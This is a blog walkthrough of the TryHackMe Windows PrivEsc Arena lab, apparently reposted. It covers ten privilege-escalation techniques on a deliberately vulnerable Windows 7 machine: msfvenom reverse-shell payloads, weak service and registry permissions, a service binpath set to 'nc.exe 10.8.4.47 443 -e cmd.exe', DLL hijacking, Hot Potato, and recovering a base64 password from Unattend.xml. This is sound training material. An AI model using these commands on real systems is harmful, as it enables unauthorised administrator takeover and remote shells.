thm-windowsprivescarena-nl

Windows Privilege Escalation without Metasploit

This blog will cover the Windows Privilege Escalation tactics and techniques without using Metasploit 🙂

Before I start, I would like to thank the TryHackMe team and Mr. Heath Adams is also known as TheCyberMentor for creating such a good machine.

You can access the machine below. It’s free and you will be awarded a Windows Priv Esc badge once you complete all the tasks.

TryHackMe | Windows PrivEsc Arena

Students will learn how to escalate privileges using a very vulnerable Windows 7 VM. RDP is open. Your credentials are…

tryhackme.com

The attacking machine available on TryHackMe uses only RDP. So I have created a payload using msfvenom to get an active session of the least privileged user.

This scenario is suitable when you try to exploit a machine using vulnerability by publicly available exploits and get the least privileged user session and then try to escalate the administrator rights.

To set up this environment, first create a payload using msfvenom:

msfvenom -p windows/shell_reverse_tcp lhost=[kali machine IP] lport=443 -f exe -o access.exe

Now, transfer it using smberver and get access using Netcat as shown below:

Now that we have the least privileged user session, the system is ready to perform the attacks.

Let’s start one by one:

1.Registry Escalation — Autorun

First, copy the accesschk64.exe to the system using smbserver and then copy and run below command:

accesschk64.exe -wvu “C:\Program Files\Autorun Program”

You will notice that Everyone has FILE_ALL_ACCESS to program.exe which is an autorun program. This means we can exploit program.exe by creating exploit with the same name.

To exploit this, generate an exploit using msfvenom and copy to the C:\Program FIles\Autorun Program folder as below:

Use Netcat to listen on port 443 and wait for an admin to login. once admin is logged in you will get the admin session.

2.Registry Escalation — AlwaysInstallElevated

Run the following commands:

reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer

You will notice that AlwaysInstallElevated value is set to 1 which is used to install a Windows Installer package with elevated (system) privileges.

Now generate payload using msfvenom and transfer it to a temp folder.

Listen on port 443 using Netcat and run the command:

msiexec /quiet /qn /i C:\Temp\setup.msi

You will get an administrator session.

3.Service Escalation — Registry

Run the following command to run PowerShell command on cmd:

%SystemRoot%\sysnative\WindowsPowerShell\v1.0\powershell.exe “Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl”

You will notice that the user belongs to “NT AUTHORITY\INTERACTIVE” has “FullContol” permission over the registry key.

Download the windows_service.c from below link:

sagishahar/scripts

Miscellaneous scripts and tools. Contribute to sagishahar/scripts development by creating an account on GitHub.

github.com

Edit the system command and replace it with cmd.exe /k net localgroup administrators user /add

Install gcc-mingw-w64 by sudo apt install gcc-mingw-w64 and compile c file using by x86_64-w64-mingw32-gcc windows_service.c -o x.exe

Transfer the x.exe using smbserver to a temp folder and run:

reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f

sc start regsvc

You can see the user has been added to the administrator group.

4.Service Escalation — Executable Files

First, copy the accesschk64.exe to the system using smbserver and then copy and run:

accesschk64.exe -wvu “C:\Program Files\File Permissions Service”

You will notice that the “Everyone” has “FILE_ALL_ACCESS” permission on the filepermservice.exe file.

Now generate payload with name as filepermservice.exe using msfvenom

Transfer the same using smbserver to the c:\Program Files\File Permissions Service folder and start the service by the command below:

sc start filepermsvc

Run Netcat on port 443 and you will get administrator session

5.Privilege Escalation — Startup Applications

Run the following command:

icacls.exe “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup”

You will notice that the “BUILTIN\Users” has full access ‘(F)’ to the directory.

Now generate a payload using msfvenom and transfer it using smbserver to C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup folder

Now wait for an admin to login and you will get the administrator session

6.Service Escalation — DLL Hijacking

Download the windows_dll.c from below link:

sagishahar/scripts

Miscellaneous scripts and tools. Contribute to sagishahar/scripts development by creating an account on GitHub.

github.com

Edit the windows_dll.c file and add cmd.exe /k net localgroup administrators user /add

Compile it by 86_64-w64-mingw32-gcc windows_dll.c -shared -o hijackme.dll

Transfer the x.exe using smbserver to a temp folder and run:

sc stop dllsvc & sc start dllsvc

The user will get added to the administrator’s group

7.Service Escalation — binPath

Transfer accesschk64.exe using smbserver and run the following command:

accesschk64.exe -accepteula -wuvc daclsvc

You will notice that the user “User-PC\User” has the “SERVICE_CHANGE_CONFIG” permission.

Now stop service before adding the command to daclsvc

sc start daclsvc and sc config daclsvc binpath= “C:\Users\user\Desktop\nc.exe 10.8.4.47 443 -e cmd.exe”

Now transfer nc.exe using smbserver and then start service, you will get an administrator session using Netcat on port 443

8.Service Escalation — Unquoted Service Paths

Run the following command:

sc qc unquotedsvc

You will notice that the “BINARY_PATH_NAME” field displays a path that is not confined between quotes.

Now generate payload using msfvenom and transfer nc.exe using smbserver

msfvenom -p windows/exec CMD=’C:\Users\user\Desktop\nc.exe 10.8.4.47 443 -e cmd.exe’ -f exe-service -o common.exe

Transfer payload using smbserver to C:\Program Files\Unquoted Path Service folder

Now start service and you will get the administrator session on Netcat.

9.Potato Escalation — Hot Potato

Transfer nc.exe, potato.exe, Nhttp.dll, Sharpcifs.dll using smbserver

Run the following command:

Potato.exe -ip 10.10.175.206 -disable_exhaust true -cmd “C:\Users\user\Desktop\nc.exe 10.8.4.47 443 -e cmd.exe”

Here IP is victim machine IP

Now listen Netcat on port 443 and wait. You will get an administrator session.

10.Password Mining Escalation — Configuration Files

Open C:\Windows\Panther\Unattend.xml in cmd using the following command:

type C:\Windows\Panther\Unattend.xml

Decode the value using echo -n “cGFzc3dvcmQxMjM=” |base64 -d

And you will get the password for admin in cleartext.

I hope you will find this post helpful especially for those who are planning OSCP in the near future.

Author : https://medium.com/@sushantkamble/windows-privilege-escalation-without-metasploit-9bad5fbb5666

Beveiligd: htb-admirer-nl

De inhoud is beveiligd met een wachtwoord. Vul het wachtwoord hieronder in om hem te kunnen bekijken:

Geplaatst op

Beveiligd: htb-quick-nl

De inhoud is beveiligd met een wachtwoord. Vul het wachtwoord hieronder in om hem te kunnen bekijken:

Geplaatst op